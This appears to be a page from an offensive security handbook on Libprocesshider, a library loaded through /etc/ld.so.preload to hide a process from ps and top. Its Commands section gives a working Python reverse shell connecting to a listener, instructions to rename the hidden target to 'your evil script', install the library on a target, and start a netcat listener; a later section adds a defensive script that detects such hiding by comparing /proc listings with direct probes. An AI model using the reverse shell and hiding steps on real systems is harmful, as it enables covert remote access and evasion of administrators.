handbook/tools/5.Machine/1.Linux/General/Exploitation/AV-Detection-Evasion/Evasion-Techniques/Tools/Libprocesshider.md

2024-08-30 23:07:22 +00:00
## General
GOAL ---> Hide a process from `ps aux`
Libprocesshider is a library that allows software developers to hide the details of a process from the operating system's userland tooling. It provides an API for hiding the process name and arguments, as well as for hiding the presence of the process from process management utilities such as `ps` and `top`. The library is useful for hiding the details of malware or other types of malicious software, as well as for protecting proprietary software from reverse engineering.
Important
- Can only hide one process at a time
- It works by being preloaded into every dynamically linked program through `/etc/ld.so.preload`, so the kernel still knows about the process: statically linked tools, or anything that reads `/proc/<pid>` directly instead of listing `/proc`, are not fooled
## Commands
The repository needs to be cloned on the target (Linux machine)
Download the repository (Target)
```
git clone https://github.com/gianlucaborello/libprocesshider.git
```
Create the reverse shell and compile the code (Target)
```
# Create the reverse shell script (reverse_shell.py)
nano reverse_shell.py
```
Contents of `reverse_shell.py` (replace `IP` and `PORT` with the listener's address and port):
```
#!/usr/bin/python3
from os import dup2
from subprocess import run
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("IP", PORT))
# Redirect stdin, stdout and stderr to the socket
dup2(s.fileno(), 0)
dup2(s.fileno(), 1)
dup2(s.fileno(), 2)
run(["/bin/bash", "-i"])
```
```
# Make the script executable
chmod +x reverse_shell.py
# Edit processhider.c: change the script name it filters to the name of your evil script, then save
nano processhider.c
# Compile the code in the cloned directory
USER@sid:~/libprocesshider$ make
'---> This will create libprocesshider.so
# Copy the file in the right folder
cp libprocesshider.so /usr/local/lib/
# Load it with the global dynamic linker
echo /usr/local/lib/libprocesshider.so >> /etc/ld.so.preload
```
Launch the reverse_shell
```
./reverse_shell.py
```
Netcat listener (Attacking machine)
```
nc -lvnp PORT
```
The process should now be hidden from `ps aux`
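From the defender's side, the two facts above (the library rides in through `/etc/ld.so.preload`, and it only filters `readdir()` on `/proc`) give a straightforward check. The script below is an added example written for this page, not code from the libprocesshider project: it lists the preloaded libraries and then compares the PIDs a normal directory listing of `/proc` returns (what `ps` sees) against the PIDs found by probing `/proc/<pid>` one by one with `stat()`, which the hook cannot intercept. The `pid_max` fallback value and the sample inputs in the helpers are assumptions.

```python
#!/usr/bin/env python3
"""Added detection example (not part of libprocesshider): spot a readdir()-hooking
process hider.

  1. /etc/ld.so.preload names libraries every dynamically linked program loads;
     that file is how libprocesshider gets into ps, top and friends.
  2. A hook that filters readdir("/proc") cannot stop a direct stat() of
     /proc/<pid>, so probing PIDs one by one reveals entries listdir() omits.
"""
import os

PRELOAD_PATH = "/etc/ld.so.preload"


def parse_preload(text):
    """Return the library paths in ld.so.preload-style content.

    The loader accepts whitespace-separated paths, and '#' starts a comment.
    """
    libs = []
    for line in text.splitlines():
        line = line.split("#", 1)[0]
        libs.extend(line.split())
    return libs


def check_preload(path=PRELOAD_PATH):
    """Preloaded libraries on this host, or [] when the file is absent."""
    try:
        with open(path) as fh:
            return parse_preload(fh.read())
    except OSError:
        return []


def listed_pids(proc="/proc"):
    """PIDs as readdir() reports them: this is the (possibly filtered) view ps gets."""
    return {int(name) for name in os.listdir(proc) if name.isdigit()}


def probed_pids(proc="/proc", max_pid=None):
    """PIDs found by stat()ing /proc/<pid> directly, bypassing readdir()."""
    if max_pid is None:
        try:
            with open("/proc/sys/kernel/pid_max") as fh:
                max_pid = int(fh.read())
        except OSError:
            max_pid = 4194304  # assumed upper bound (kernel default on 64-bit)
    return {pid for pid in range(1, max_pid + 1) if os.path.isdir(f"{proc}/{pid}")}


def hidden_pids(listed, probed):
    """PIDs that exist but are missing from the directory listing.

    Pure helper so it can be tested on constructed sets. A process that exits
    between the two scans also shows up here, so callers re-check each hit.
    """
    return sorted(probed - listed)


def describe(pid, proc="/proc"):
    """Best-effort command line for a PID, read straight from /proc."""
    try:
        with open(f"{proc}/{pid}/cmdline", "rb") as fh:
            return fh.read().replace(b"\0", b" ").decode(errors="replace").strip()
    except OSError:
        return "<gone>"


def self_visible(proc="/proc"):
    """Sanity check: this script's own PID must appear in both views."""
    me = os.getpid()
    return me in listed_pids(proc) and me in probed_pids(proc, max_pid=me)


if __name__ == "__main__":
    print("ld.so.preload entries:", check_preload() or "none")
    candidates = hidden_pids(listed_pids(), probed_pids())
    # Second pass: drop short-lived processes that merely exited mid-scan.
    still_listed = listed_pids()
    suspects = [p for p in candidates
                if os.path.isdir(f"/proc/{p}") and p not in still_listed]
    for pid in suspects:
        print(f"hidden pid {pid}: {describe(pid)}")
    if not suspects:
        print("no hidden pids")
```

Run it as root so every `/proc/<pid>/cmdline` is readable; the full probe walks up to `pid_max` entries, which takes a few seconds. A non-empty `ld.so.preload` on a host that does not deliberately use it is worth an alert on its own, independent of whether the PID comparison finds anything.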
## More Information
More information ---> https://github.com/gianlucaborello/libprocesshider